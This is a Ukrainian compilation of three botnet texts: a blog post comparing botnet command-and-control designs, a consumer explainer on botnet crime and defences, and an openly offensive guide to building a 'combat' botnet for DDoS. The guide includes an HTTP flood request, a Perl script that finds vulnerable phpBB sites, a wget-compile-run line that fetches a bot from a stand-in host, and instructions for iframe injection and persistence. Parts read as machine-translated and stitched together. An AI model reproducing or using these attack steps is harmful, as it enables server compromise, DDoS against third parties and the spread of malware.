Ботнет. Як створюються ботнети. Засоби захисту від ботнетів. Створюємо свій бойовий ботнет Управління через IRC-мережу

Не дарма я опублікував чернетку моєї замітки про пирингові мережі. Коментарі читачів виявилися дуже корисними. Саме вони надихнули мене на подальшу роботу в цьому напрямку. Що з цього вийшло - дивіться під катом.

Як видно з назви посади, сьогодні мова піде тільки про ботнетах. Про обмін файлами, проксі-мережі, пирингові блоги і p2p-валюту на час забудемо.

Під словом «ботнет» не слід розуміти щось протизаконне. Коли користувач добровільно викачує і встановлює «бота» з метою пожертвувати свій трафік і обчислювальні ресурси на потреби наукового проекту, це теж ботнет. Відповідно ботмастер не обов'язково є злочинцем. Група з 30 вчених, що займаються науковим проектом, це теж «ботмастер».

1. Управління ботнетом через сервер

Найпростіший спосіб управління ботами - запустити irc / http сервер. Через нього боти будуть отримувати команди і з його ж допомогою відсилати результат їх виконання.

Малюю, як вмію :) В даному випадку ілюстрація може і не потрібно, але я вирішив підготувати вас до шоку, який зроблять інші малюнки.

  • Дуже проста реалізація, особливо у випадку з IRC.
  • Швидка відповідь спамерських пошукових роботів.
  • Можна віддавати команди як всієї мережі, так і конкретному боту.
  • Якщо мережа складається із сотні вузлів, для управління нею досить одного каналу в DalNet. Для мереж побільше можна розщедриться на недорогий (близько 300 руб / міс) веб-хостинг.
  • У випадку з HTTP-Сервер значно спрощується розробка красивого UI. Це важливо, якщо ми використовуємо ботнет в якомусь веб-сервісі.
  • Навантаження на сервер. Число вузлів в найбільших ботнетах вимірюється мільйонами. Щоб керувати такою юрбою, одного сервера мало.
  • Якщо з сервером щось трапиться (аварія в мережі, DDoS, пожежа в дата-центрі), мережі прийде кінець.
  • Один сервер легко зафаерволіть. Це може зробити як провайдер, так і продукти Лабораторії Касперського на комп'ютері користувача.
  • Ботмастера порівняно легко знайти. Один раз забув про VPN - чекай гостей в погонах.
  • У випадку з IRC, Команди отримують тільки боти в онлайні. Якщо бот зайде на канал через дві хвилини після відправлення команди, він буде «не в темі».
  • Число ботів і їх IP можна визначити, зайшовши на IRC-канал. Захист каналу паролем не допоможе, тому що останній легко виколупати з коду бота.

2. Управління через IRC-мережу

Логічний крок для боротьби з мінусами попереднього методу - зробити не один сервер, а кілька. На мій погляд, найпростіше це зробити, піднявши свою IRC-мережу. У цьому випадку вся відповідальність на передачу даних між серверами лягає на протокол IRC. З боку ботів не буде ніякої різниці в порівнянні з попереднім рішенням.

  • Проста реалізація, хоча доведеться повозиться з налаштуванням серверів.
  • Боти як і раніше швидко реагують на команди.
  • Все ще можна віддавати команди конкретному боту.
  • Розподіл навантаження між серверами, захист від DDoS і форс-мажорів. Десяток хороших серверів може вистачити для мережі з мільйона спамерських пошукових роботів.
  • При відмові частини серверів можна встигнути їх замінити.
  • Якщо використовується IRCі бентежить тисяча ботів, що сидять на одному каналі, використовуйте кілька каналів. Відповідно можна давати різним частинам мережі різні завдання.
  • Доведеться розщедритися на сервера / VDS.
  • Можна зафаерволіть все сервера одночасно і ботмастер не встигне їх замінити.
  • Ботмастера все ще досить просто відстежити.
  • У випадку з IRC, Число ботів і їх IP як і раніше у всіх на виду.
  • Боти, які тільки що зайшли на канал, не в темі.

Термін трастрінг (trust ring, коло / кільце довіри) я вперше почув від товариша Nickolas в коментарях до попередньої замітці. Йдеться про те, щоб покласти функцію «серверів» на частину ботнету.

  • Не потрібні ніякі сервера.
  • Трастрінг може складатися із сотень вузлів. Підняти і контролювати таке число irc / http-серверів непросто.
  • Боти не повинні постійно тримати з'єднання з трастрінгом. Досить перевіряти раз в 5-10 хвилин, чи не з'явилося нових команд. Кожна команда повинна мати TTL, протягом якого вона зберігається в трастрінге.
  • Велике число «серверів» забезпечують стійкість мережі до всіляких лих. Коли частина кільця відімре, ботмастер може дати команду про створення нового трастрінга. Або це можуть зробити самі вузли кільця (потрібні цифрові підписи і згоду певного відсотка трастрінга).
  • Нехай трастрінг складається з 512 вузлів, принаймні 50% постійно знаходяться онлайн. Якщо в мережі 1 000 000 ботів і кожен з них постійно онлайн, на кожен вузол трастрінга доведеться щонайменше 4000 спамерських пошукових роботів. При запиті ботом команд (або при відправці результату) раз в 10 хвилин, кожен вузол кільця одночасно буде обробляти в середньому 7 з'єднань. Зовсім трохи для мережі такого розміру, правда?
  • Точний список всіх ботів може отримати тільки ботмастер.
  • Можна віддавати команди конкретному боту або групі спамерських пошукових роботів.
  • Швидка реакція ботів на команди.
  • Ботмастера важко знайти.

Єдиний мінус, який я бачу - складність реалізації.

4. Пірінгові мережі

Якщо вірити інтернет-джерел, в даний час великою популярністю користуються P2P ботнети. Серед цих джерел найбільшої уваги заслуговує. Кожен вузол такої мережі знає лише кілька «сусідніх» вузлів. Ботмастер посилає команди декільком вузлам мережі, після чого вона передається від сусіда до сусіда.

Список сусідів видається ботам один раз на спеціальному сервері. Їм може бути, наприклад, зламаний сайт. Більше сервер нічого не робить, він потрібен лише під час додавання нодов в ботнет.

  • Реалізація дещо простіше, ніж в попередньому пункті.
  • Мінімальне навантаження на всі вузли мережі. Розмір ботнету практично необмежений.
  • Стійкість до DDoS, відключення вузлів і тд. Зафаерволіть p2p-ботнет практично неможливо.
  • Ніяких постійних з'єднань, як у випадку з IRC.
  • Потрібен сервер, нехай і ненадовго.
  • Вузли час від часу відмирають, що позначається на зв'язності мережі.
  • Щоб отримати список всіх ботів, потрібно, наприклад, дати їм команду звернутися до певного сайту. У цьому випадку немає гарантії, що список отримає тільки ботмастер.
  • Щоб дати команду певного вузла, потрібно або надіслати її всієї мережі, або з'єднатися з вузлом безпосередньо.
  • Повільна реакіця ботів на команди.
  • Щоб послати «довгу» команду, наприклад, зі списком URL, потрібно скористатися стороннім сервером, інакше реакція ботів сповільниться ще більше.
  • Ботмастера знайти простіше, ніж в попередньому прикладі, за рахунок використання будь-ніякого сервера.

Я звичайно можу помилятися, але по-моєму p2p-ботнети набагато гірше трастрінга. Може, виробники антивірусів про щось замовчують?

5. Комплексне рішення

Один із способів винайти щось нове і хороше - схрестити щось старе. Об'єднали телефон, комп'ютер, магнітофон, фотоапарат і відеокамеру - отримали смартфон. Комп'ютером і клімат-контролем в автомобілі вже нікого не здивуєш. Приклеїмо до кожного йогурту магнітик на холодильник, і продажу злетять.

Важливо пам'ятати, що при невдалому схрещуванні ми можемо отримати ні на що не придатну особина. Нагадує генетичні алгоритми, правда? Візьмемо, здавалося б, хорошу ідею - p2p-ботнет, де за призначення сусідів відповідає трастрінг. Тоді нам не потрібен ніякий сервер!

Але в цьому випадку зросте складність реалізації, нехай і не набагато. Решта проблем p2p-ботнету залишаться невирішеними. Виграш незначний, рахунок 1: 1.

Трохи посидівши з папірцем і олівцем, я народив наступну ідею. Наскільки мені відомо, раніше вона ніколи не озвучувалася, і я перший, хто таке придумав. ЧСВ плюс 100.

Що, якщо мережа буде мати два стани - «активне» і «пасивне». У пасивному стані ботнет працює за схемою p2p. Ботмастер посилає команду «мобілізувати війська» і мережа перетворюється в трастрінг. У своїй команді ботмастер повинен вказати вузли трастрінга і час, на яке мережу змінює свій стан. Щоб кільце було побільше, можна дати команду кільком роботам назвати своїх сусідів. Далі все команди передаються через трастрінг. Він же відповідає за призначення «сусідів» новим вузлів. Якщо TTL кільця згодом виявиться недостатньо, можна дати команду «продовжити активний стан».

Такий ботнет НЕ успадкує жодного мінуса p2p-мережі і буде володіти усіма плюсами трастрінга, а також наступними:

  • Підвищена стійкість до ddos-атакам і мережевих фільтрів, як у p2p-мережі.
  • Мінімальне споживання ресурсів ботами під час простою мережі. Ботмастеру не потрібно відстежувати стан трастрінга і вибирати для нього нові вузли.
  • При створенні трастрінга вибираються тільки ті вузли, що в даний час знаходяться онлайн. Боти будуть з'єднуватися з кільцем з першої спроби (якийсь час).
  • Список «сусідів» періодично оновлюється. Все одно IP вузлів, що входять у тимчасове кільце, знає весь ботнет. Так нехай вважають ці вузли сусідами, якщо частина справжніх сусідів давно не з'являлася в мережі.

І єдиний недолік, який я тут бачу - складність реалізації. Але це насправді не є проблемою.

6. Про що важливо пам'ятати

До сих пір я мовчав про деякі моменти, тому що вони властиві будь-якому з названих способів управління ботнетом. Слід загострити на них увагу.

  • Частина вузлів не може приймати вхідні з'єднання через фаєрвол або NAT. Як мінімум, це потрібно врахувати при написанні бота. Наприклад, при поширенні команд в p2p-мережі бот повинен сам періодично звертатися до сусідів, а не чекати команди від них.
  • Слід виходити з того, що всі команди, що посилаються мережі, прослуховуються. Як мінімум, зацікавлена ​​особа може модифікувати для цих цілей код бота. Проте, має сенс шифрувати весь трафік, що передається в мережі. Як мінімум, це ускладнить аналіз ботнету.
  • Всі команди ботмастера повинні підписуватися цифровим підписом. Паролі не годяться, тому що можуть бути перехоплені.
  • Раз мова зайшла про реалізацію, зазначу, що в будь-якому ботнет повинні бути передбачені як мінімум три команди - оновлення ботів, оновлення ключа ботмастера і самознищення всієї мережі.
  • У мережі є «шпигунські» Ноди. Частина з них входить в трастрінг. При цьому ми не знаємо цілей, які ці «шпигуни» переслідують - це може бути визначення IP ботмастера, зрив виконання команд, виведення мережі з ладу, отримання контролю над ботнетом і так далі. Зокрема, це означає, що боти повинні вибирати випадковий вузол при з'єднанні з кільцем, а не використовувати весь час один і той же.
  • На малюнку вузли трастрінга з'єднуються кожен з кожним, але куди практичніше реалізувати кільце у вигляді невеликої p2p-мережі, тобто за принципом «сусідів».

Також зазначу, що рішення 1 та 2 (сервер, багато серверів) позбавляються багатьох мінусів і отримують пару плюсів від рішення 3 (трастрінга) при використанні протоколу HTTP. Прокрутіть ще раз ці пункти, щоб зрозуміти, про що я.

7. Висновки

Для невеликих мереж хорошим рішенням є використання IRC. Наприклад, якщо ви хочете створити свою невелику мережу для розподілених обчислень, встановіть бота на домашньому комп'ютері, ноутбуці, нетбуці, робочому комп'ютері (якщо це дозволяє політика компанії) і керуйте мережею через DalNet. Якщо знадобиться, пізніше мережу можна буде «прокачати» до трастрінга. Ви ж передбачте відповідну команду, вірно?

Якщо до ботнету потрібен гарний веб-інтерфейс, можливо, має сенс написати додаткову програму, яка буде забирати команди з веб-сервера і відправляти їх в IRC. По крайней мере, розгляньте цей підхід.

Універсальні рішення - це трастрінг і p2p + трастрінг. Такі мережі будуть ідеально працювати незалежно від того, скільки в них вузлів, 1 або 1 000 000, без жодних серверів.

Зважаючи на наявність у «чистого p2p» явних недоліків в порівнянні з кільцем, мені залишається неясним, чому він вважається вдалим рішенням. Напевно в ботах, з яких складається мережа, є багато корисних функцій. Чому б не додати ще один маленький payload - мобілізацію мережі в трастрінг?

Ось, мабуть, і все. Буду радий будь-яким вашим коментарям. Особливо з критикою, вказівками на неточності / суперечності в тексті й ваших ідей з приводу порушеної теми.

Сьогодні ботнети стали одним з головних інструментів кіберзлочинців. ComputerBild розповість, що таке ботнети, як вони працюють і як врятувати свій комп'ютер від попадання в зомбі-мережа.

Ботнет, або зомбі-мережа, - це мережа комп'ютерів, заражених шкідливою програмою, що дозволяє зловмисникам віддалено керувати чужими машинами без відома їх власників. В останні роки зомбі-мережі стали стабільним джерелом доходу для кіберзлочинців. Незмінно низькі витрати і мінімум знань, необхідних для управління ботнетами, сприяють зростанню популярності, а значить, і кількості ботнетів. На DDoS-атаках або спам-розсилках, здійснюваних за допомогою зомбі-мереж, зловмисники і їх замовники заробляють тисячі доларів.

Заражений мій комп'ютер ботом?

Відповісти на це питання непросто. Справа в тому, що відстежити втручання ботів в повсякденну роботу ПК практично неможливо, оскільки воно ніяк не відбивається на швидкодії системи. Проте існує кілька ознак, за якими можна визначити, що в системі присутній бот:

Невідомі програми намагаються здійснити з'єднання з Інтернетом, про що періодично обурено доповідає брандмауер або антивірусне ПЗ;

Інтернет-трафік стає дуже великий, хоча ви користуєтеся Мережею досить помірковано;

У списку запущених системних процесів з'являються нові, що маскуються під звичайні процеси Windows (наприклад, бот може носити ім'я scvhost.exe - це назва дуже схоже на назву системного процесу Windows svchost.exe; помітити різницю досить складно, але - можна).

Навіщо створюються ботнети

Ботнети створюються, щоб заробляти гроші. Можна виділити кілька сфер комерційно вигідного застосування зомбі-мереж: DDoS-атаки, збір конфіденційної інформації, розсилка спаму, фішинг, пошуковий спам, накрутка клік-лічильників та ін. Треба зауважити, що прибутковим буде будь-який напрямок, яке б зловмисник не вибрав, причому ботнет дозволяє здійснювати всі перераховані види діяльності одночасно.

DDoS-атака (від англ. Distributed Denial-of-Service) - це атака на комп'ютерну систему, наприклад на веб-сайт, метою якої є доведення системи до «падіння», тобто стану, коли вона більше не зможе приймати і обробляти запити легітимних користувачів. Один з найпоширеніших методів проведення DDoS-атаки - відправка численних запитів на комп'ютер або сайт-жертву, що і призводить до відмови в обслуговуванні, якщо ресурси атакується комп'ютера недостатні для обробки всіх запитів, що надходять. DDoS-атаки є грізною зброєю хакерів, а ботнет - ідеальним інструментом для їх проведення.

DDoS-атаки можуть бути як засобом недобросовісної конкурентної боротьби, так і актами кібертероризму. Господар ботнету може надати послугу кожному не дуже делікатному підприємцю - провести DDoS-атаку на сайт його конкурента. Атакується ресурс після такого навантаження «ляже», замовник атаки отримає тимчасову перевагу, а кіберзлочинець - скромне (або не дуже) винагороду.

Таким же чином самі власники ботнетів можуть використовувати DDoS-атаки для вимагання грошей у великих компаній. При цьому компанії вважають за краще виконувати вимоги кіберзлочинців, оскільки ліквідація наслідків вдалих DDoS-атак стоїть досить дорого. Наприклад, в січні 2009 року один з найбільших хостерів GoDaddy.com піддався DDoS-атаці, в результаті якої тисячі сайтів, розміщених на його серверах, виявилися недоступними майже на добу. Фінансові втрати хостера були величезні.

У лютому 2007 року було проведено ряд атак на кореневі DNS-сервери, від роботи яких безпосередньо залежить нормальне функціонування всього Інтернету. Малоймовірно, що метою цих атак було обвалення Всесвітньої мережі, адже існування зомбі-мереж можливо тільки за умови, що існує і нормально функціонує Інтернет. Найбільше це було схоже на демонстрацію сили і можливостей зомбі-мереж.

Реклама послуг зі здійснення DDoS-атак відкрито розміщена на багатьох форумах відповідної тематики. Ціни на атаки коливаються від 50 до кількох тисяч доларів за добу безперервної роботи DDoS-ботнету. За даними сайту www.shadowserver.org, за 2008 рік було проведено близько 190 тисяч DDoS-атак, на яких кіберзлочинці змогли заробити близько 20 мільйонів доларів. Природно, в цю суму не включені доходи від шантажу, які просто неможливо підрахувати.

Збір конфіденційної інформації

Конфіденційна інформація, яка зберігається на комп'ютерах користувачів, завжди буде залучати зловмисників. Найбільший інтерес представляють номера кредитних карт, фінансова інформація і паролі до різних служб: поштових скриньках, FTP-серверів, «мессенджерам» і ін. При цьому сучасні шкідливі програми дозволяють зловмисникам вибирати саме ті дані, які їм цікаві, - для цього досить завантажити на ПК відповідний модуль.

Зловмисники можуть або продати вкрадену інформацію, або використовувати її в своїх інтересах. На численних форумах в Мережі кожен день з'являються сотні оголошень про продаж банківських облікових записів. Витрати облікового запису залежить від кількості грошей на рахунку користувача і становить від 1 до 1500 доларів за рахунок. Нижня межа свідчить про те, що в ході конкурентної боротьби кіберзлочинці, які займаються такого роду бізнесом, змушені знижувати ціни. Щоб заробити справді багато, їм необхідний стабільний приплив свіжих даних, а для цього обов'язковий стабільне зростання зомбі-мереж. Особливо цікава фінансова інформація кардерам - зловмисникам, які займаються підробкою банківських карт.

Про те, наскільки вигідні такі операції, можна судити по відомій історії з групою бразильських кіберзлочинців, які були заарештовані два роки тому. Вони змогли зняти з банківських рахунків простих користувачів 4,74 мільйона доларів, використовуючи вкрадену з комп'ютерів інформацію. У придбанні персональних даних, які не мають прямого відношення до грошей користувача, зацікавлені і злочинці, які займаються підробкою документів, відкриттям фальшивих банківських рахунків, вчиненням незаконних угод і т.д.

Ще одним видом збирається ботнетами інформації є адреси електронної пошти, причому, на відміну від номерів кредиток і облікових записів, з адресної книги одного зараженого ПК можна витягти безліч електронних адрес. Зібрані адреси виставляються на продаж, причому іноді «на вагу» - помегабайтно. Основними покупцями подібного «товару» є спамери. Список з мільйона e-mail-адрес коштує від 20 до 100 доларів, а замовлена ​​спамерам розсилка на цей же мільйон адрес - 150-200 доларів. Вигода очевидна.

Злочинцям також цікаві облікові записи різних платних сервісів та інтернет-магазинів. Безумовно, вони обходяться дешевше банківських облікових записів, але їх реалізація пов'язана з меншим ризиком переслідування з боку правоохоронних органів.

Щодня по всьому світу курсують мільйони спам-повідомлень. Розсилка незапрошенной пошти є однією з основних функцій сучасних ботнетів. За даними «Лабораторії Касперського», близько 80% всього спаму розсилається через зомбі-мережі. З комп'ютерів законослухняних користувачів відправляються мільярди листів з рекламою «Віагри», копій дорогих годинників, онлайн-казино і т. П., Що забивають канали зв'язку і поштові скриньки. Таким чином хакери ставлять під удар комп'ютери ні в чому не винних користувачів: адреси, з яких ведеться розсилка, потрапляють в чорні списки антивірусних компаній.

В останні роки сама сфера спам-послуг розширилася: з'явився ICQ-спам, спам в соціальних мережах, форумах, блогах. І це теж «заслуга» власників ботнетів: адже зовсім нескладно дописати до бот-клієнту додатковий модуль, що відкриває горизонти для нового бізнесу зі слоганами на кшталт «Спам в Facebook. Недорого ». Ціни на спам варіюються в залежності від цільової аудиторії і кількості адрес, на які ведеться розсилка. Розкид цін на цільові розсилки - від 70 доларів за сотні тисяч адрес до 1000 доларів за кілька десятків мільйонів адрес. За минулий рік спамери заробили на розсилці листів близько 780 мільйонів доларів.

Створення пошукового спаму

Ще один варіант використання ботнетів - підвищення популярності сайтів в пошукових системах. Працюючи над пошуковою оптимізацією, адміністратори ресурсів намагаються підвищити позицію сайту в результатах пошуку, оскільки чим вона вище, тим більше відвідувачів зайде на сайт через пошукові системи і, отже, тим більше буде виручка власника сайту, наприклад від продажу рекламних площ на веб-сторінках. Багато компаній платять веб-майстрам чималі гроші, щоб вони вивели сайт на перші позиції в «пошукових системах». Власники ботнетів підгледіли деякі їх прийоми і автоматизували процес пошукової оптимізації.

Коли ви бачите в коментарях до запису свого в «Живому Журналі» або вдалої фотографії, викладеної на фотохостингу, безліч посилань, створених невідомим вам людиною, а іноді і вашим «френдом», - не дивуйтеся: просто хтось замовив розкрутку свого ресурсу господарям ботнету. Спеціально створена програма завантажується на зомбі-комп'ютер і від імені його власника залишає на популярних ресурсах коментарі з посиланнями на що розкручується сайт. Середня ціна на нелегальні послуги пошукового спаму - близько 300 доларів на місяць.

Скільки коштують персональні дані

Вартість вкрадених персональних даних безпосередньо залежить від країни, в якій живе їх законний власник. Наприклад, повні дані жителя США стоять 5-8 доларів. На чорному ринку особливо цінуються дані жителів Євросоюзу - вони в два-три рази дорожче даних громадян США і Канади. Це можна пояснити тим, що такими даними злочинці можуть користуватися в будь-якій країні, що входить в ЄС. В середньому по світу ціна повного пакета даних про одну людину становить близько $ 7.

На жаль, тому, хто вирішив «з нуля» організувати ботнет, не складе особливих труднощів знайти в Інтернеті інструкцію по створенню зомбі-мережі. Перший крок: створити нову зомбі-мережа. Для цього потрібно заразити комп'ютери користувачів спеціальною програмою - ботом. Для зараження використовуються спам-розсилки, постинг повідомлень на форумах і в соціальних мережах і інші прийоми; часто бот наділяється функцією самораспространения, як віруси або черв'яки.

Щоб змусити потенційну жертву встановити бот, використовують прийоми соціальної інженерії. Наприклад, пропонують подивитися цікаве відео, для чого потрібно завантажити спеціальний кодек. Після завантаження та запуску такого файлу користувач, звичайно, не зможе подивитися ніякого відео і швидше за все не помітить взагалі ніяких змін, а його ПК виявиться заражений і стане покірним слугою, який виконує всі команди господаря ботнету.

Другим широко використовуваним методом зараження ботами є drive-by-завантаження. При відвідуванні користувачем зараженої веб-сторінки на його комп'ютер через різні «дірки» в додатках - перш за все в популярних браузерах - завантажується шкідливий код. Для експлуатації слабких місць використовуються спеціальні програми - експлойти. Вони дозволяють не тільки непомітно завантажити, але і непомітно запустити вірус або бот. Такий вид поширення шкідливого ПЗ найбільш небезпечний, адже, якщо зламаний популярний ресурс, заразиться десятки тисяч користувачів!

Бот можна наділити функцією самораспространения по комп'ютерних мережах. Наприклад, він може поширюватися шляхом зараження всіх доступних виконуваних файлів або шляхом пошуку і зараження комп'ютерів мережі.

Заражені комп'ютери нічого не підозрюють користувачів творець ботнету може контролювати за допомогою командного центру ботнету, зв'язуючись з ботами через IRC-канал, веб-з'єднання або за допомогою будь-яких інших доступних засобів. Досить об'єднати в мережу декілька десятків машин, щоб ботнет почав приносити своєму господареві дохід. Причому цей дохід знаходиться в лінійній залежності від стійкості зомбі-мережі і темпів її зростання.

Рекламні компанії, що працюють онлайн за схемою PPC (Pay-per-Click), платять гроші за унікальні кліки по посиланнях на розміщених в Інтернеті оголошеннях. Для власників ботнету обман таких компаній є прибутковим заняттям. Для прикладу можна взяти відому мережу Google AdSense. Вхідні в неї рекламодавці платять Google за кліки по розміщеним оголошенням в надії, що заглянув «на вогник» користувач що-небудь у них купить.

Google в свою чергу розміщує контекстну рекламу на різних сайтах, що беруть участь в програмі AdSense, сплачуючи власнику сайту відсоток з кожного кліка. На жаль, не всі власники сайтів чесні. Маючи зомбі-мережа, хакер може генерувати тисячі унікальних кліків в день - по одному з кожної машини, щоб не викликати особливих підозр у Google. Таким чином, гроші, витрачені на рекламну компанію, перетечуть в кишеню до хакеру. На жаль, не було ще жодного випадку, коли за подібні акції кого-небудь притягували до відповідальності. За даними компанії Click Forensics, в 2008 році близько 16-17% всіх переходів по рекламних посиланнях були підробленими, з них мінімум третина генерировалась ботнетами. Виконавши нескладні обчислення, можна зрозуміти, що в минулому році власники ботнетів «накликали» 33 000 000 доларів. Непоганий дохід від кліків мишкою!

Зловмисникам і нечистим на руку бізнесменам зовсім не обов'язково своїми силами створювати ботнет «з нуля». Ботнети самих різних розмірів і продуктивності вони можуть купити або орендувати у хакерів - наприклад, звернувшись на спеціалізовані форуми.

Вартість готового ботнету, так само як і вартість його оренди, безпосередньо залежить від кількості вхідних в нього комп'ютерів. Найбільшою популярністю готові ботнети користуються на англомовних форумах.

Маленькі ботнети, що складаються з декількох сотень ботів, коштують від 200 до 700 доларів. При цьому середня ціна одного бота становить приблизно 50 центів. Більші ботнети коштують великих грошей.

Зомбі-мережу Shadow, яка була створена кілька років тому 19-річним хакером з Голландії, налічувала понад 100 тисяч комп'ютерів, розташованих по всьому світу, продавалася за 25 000 євро. За ці гроші можна купити невеликий будиночок в Іспанії, проте злочинець з Бразилії вважав за краще придбати ботнет.

Засоби захисту від ботнетів

1. В першу чергу це анітівірусние програми і комплексні пакети для захисту від інтернет-загроз з регулярно оновлюваними базами. Вони допоможуть не тільки вчасно виявити небезпеку, а й ліквідувати її до того, як ваш перетворений на зомбі вірний «залізний друг» почне розсилати спам або «упускати» сайти. Комплексні пакети, наприклад Kaspersky Internet Security 2009, містять повний комплект захисних функцій, управляти якими можна через загальний командний центр.

Антивірусний модуль у фоновому режимі виконує сканування найважливіших системних областей і контролює всі можливі шляхи вторгнення вірусів: вкладення електронної пошти і потенційно небезпечні веб-сайти.

Брандмауер стежить за обміном даними між персональним комп'ютером та Інтернетом. Він перевіряє всі пакети даних, що отримуються з Мережі або відправляються туди, і при необхідності блокує мережеві атаки і перешкоджає таємницею відправці особистих даних в Інтернет.

Спам-фільтр захищає поштову скриньку від проникнення рекламних повідомлень. У його завдання також входить виявлення фішингових листів, за допомогою яких зловмисники намагаються вивудити у користувача інформацію про його даних для входу в онлайнові платіжні або банківські системи.

2. Регулярне оновлення операційної системи, веб-браузерів і інших додатків, розробники яких виявляють і ліквідують багато проломи в їх захисті, а також слабкі місця, які використовуються зловмисниками.

3. Спеціальні програми-шифрувальники захистять ваші персональні дані, навіть якщо бот вже проник на комп'ютер, адже для доступу до них йому доведеться зламати пароль.

4. Здоровий глузд і обережність. Якщо ви хочете захистити свої дані від різного роду погроз, не варто завантажувати та встановлювати програми невідомого походження, відкривати архіви з файлами всупереч попередженням антивіруса, заходити на сайти, які браузер позначає як небезпечні, і т.д.

Дякуємо «Лабораторію Касперського» за допомогу в підготовці матеріалу

Системи захисту постійно удосконалюються, програмісти стають більш досвідченими. Тепер допускається все менше і менше широко відомих помилок.

[Пролог]
Інтернет розростається з величезною силою. Хакеру стає все важче шукати уразливості. Адміни використовують для захисту розробки крутих security ЕКСПЕРТІВ. Дізнаєшся свої думки? Насправді в інтернеті повно вразливостей, от толку від них мало. Ну, це ще як подивитися Ось, уяви собі ситуацію, тебе дістав якийсь мережевий ублюдок, ти хочеш його покарати. Сьогодні ми поговоримо про створення власного бойового ботнету.
Отже, що ж таке "бот". Непосвяченому людині відразу в пам'ять кидаються тупі супротивники в комп'ютерних іграх, яких ти перестріляєш за дві хвилини. Так, це частково так. У нашому випадку "бот" - це програма яка виконує закладену в неї команди. Вроди нічого особливого. Хтось заперечить: "Я, мовляв, в п'ять років таке написав, натискаєш на кнопочку і програма, оля-ля, закривається" Забудемо дитинство. Ми всі знаємо що можливості кодинга безмежні, і використовувати його можна для добра і зла. Ми, звичайно, адже завжди використовуємо наші розробки з благими намерініямі. "Ботнет" - це безліч ботів зібраних в одному центрі, які синхронно виконують команди власника. Боти, до речі, в основному націлені більше на Windows машини. Тут тобі і паролі можна поцупити, і сокс поставити, і гвинт форматнуть Я відійду від правил і розповім як створити ботнет з nix машин. Основна функція нашого бота- це огранизация DDOS атак. Це ідеальний спосіб використовувати широкі канали nix серверів. Підрахуємо. Сервер який потрібно "завалити" стоїть на 100Mb каналі. Тобто, 10-20 ботів стоять на такому ж каналі завалять сервер бездоганно. Якщо від одного сервера можна прикрити фаєрволом, то від більшої кількості ботів, на жаль, порятунку немає

[Пишемо бота]
Лістинг зразкового бота ти знайдеш по лінку в кінці статті. Розберемося трохи з кодом. (Еее, Дрім знову все контролюється через IRC? Через WEB крутіше!). До речі, контроль через IRC був обраний через його інтерактивність. Припустимо, мені захочеться порутать локальними ядерними експлойтів парочку серверів в ботнет. Я просто виконаю команду SH uname -a засобами бота і моментально знайду потрібний мені комп. Потім також виконавши команду в IRC клієнта, завантажуючи бекдор і отримаю інтерактивний шелл для подальших дій. Можливості безмежні. Ти скажеш - реалізувати такий контроль можна і через WEB, але навіщо перезавантажувати сторінку і витрачати трафік? Гороздо зручніше спостерігати все в реальному часі (хоча, при ботнет понад 1000 ботів, можна подбає про зручність інтерфейсу прим. Здорового глузду). Багато хто думає, що огранизация DDOS справа дуже складна. Ось приклад коду звичайної атаки:

GET /server.org HTTP / 1.0 \ r \ nConnection: Keep-Alive \ r \ nUser-Agent: Mozilla / 4.75 (X11; U; Windows 5.2 i686) \ r \ nHost: server.org:80\r\nAccept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, image / png, * / * \ r \ nAccept-Encoding: gzip \ r \ nAccept-Language: en \ r \ nAccept-Charset: iso- 8859-1, *, utf-8 \ r \ n \ r \ n

Тобто, ми просто посилаємо запит серверу змушуючи на нього відповісти. Причому посилаємо його поки сервер не ляже від нестачі трафіку або процесорного часу. Але хіба ти огранічешся одними nix ботами, потрібно адже створювати і віндового ботнет, наприклад, на основі AgoBot. Для цього можна створити якийсь код для бота який буде сканувати на предмет lsasl / dcom вразливостей машини які Коннект до сервера на якому встановлено бот.

[Створюємо ботнет]
Насправді створити ботнет дуже легко. Для цього нам знадобиться знайти вразливість в будь-якому web скрипті. Знайдена уразливість повинна дозволяти виконувати команди shell інтерпрітататора. Коли знайдеш вразливість, зверни увагу на назву бажного файлу, його заголовок, назва вразливою системи. Тепер, за допомогою цих даних, потрібно скласти хороший пошуковий запит. Наприклад, візьмемо всім відому уразливість в phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ Sock = IO :: Socket :: INET-> new (PeerAddr => "search.aol.com", PeerPort => "80", P ro to => "tcp") or next; print $ sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP / 1.0 \ n \ n"; @resu =<$sock>; close ($ sock);

Wget http://server.org/bot.c;gcc bot.c -o bash; chmod + x bash; ./ bash;

Тут можна побачити відразу дві проблеми. wget і gcc може не виявитися або їх використання буде заборонено. Тут нам допоможуть качалки fech, curl і get або консольний броузер lynx, або ж, використовувати ftp протокол. Його реалізація складніше, але і плюс в тому, що ftp тобто всюди Що стосується компілятора, то можна просто скомпілювати бінарник на своєму короби і сподіватися що з сумісність все буде ок, або ж переписати бота на інтерпрітірование мови - Perl або PHP. У кожного способу свої достоїнства і недоліки, який використовувати, вибір твій. Я звик використовувати захоплений сервер по максимуму. Адже бот на nix сервері протримається лише до першого перезавантаження машини. З цієї ситуації є один цікавий вихід. Бот буде шукати інтерпрітіруемие файли (.pl, .php) доступні на запис і додавати в них код скачки і запуску бота. Або можна створити ще віндовий ботнет. Реалізується це також легко. Тут потрібна вразливість в браузері інтернету (Internet Explorer, Opera, Mozilla) яка призводить до стрибку і запуску потрібного файлу. Далі створюється inframe запис завантажується наш шкідливий код. Ця запис додається в усі index файли (або в усі де є html код, все залежить від твоєї нахабства). З такою роботою відмінно справляється невеликий скриптик Haz, який ти знайдеш також в архівчіке. Багтрак заповнений записами про критичних вразливостей в Internet Explorer, так що в нашому підпорядкуванні буде і ботнет на Windows системах (його плюси я згадував вище). Все, запускай нашого пошукового черв'ячка на швидкісному короби, випий кави (пиво, горілка, томатний сік) заходь на IRC канал вказаний у властивостях бота і спостерігай кількість своїх підлеглих. На закінчення хочу передати привіт всім хто мене знає і побажати тобі удачі. Не попадайся.
ХХХХХХХХХХХХХХХХХХХХХХХХХ ХХХ

Уразливість в phpBB актуальна до 2.0.16 версії, хоча розробники стверджують що вони її виправили в 2.0.11

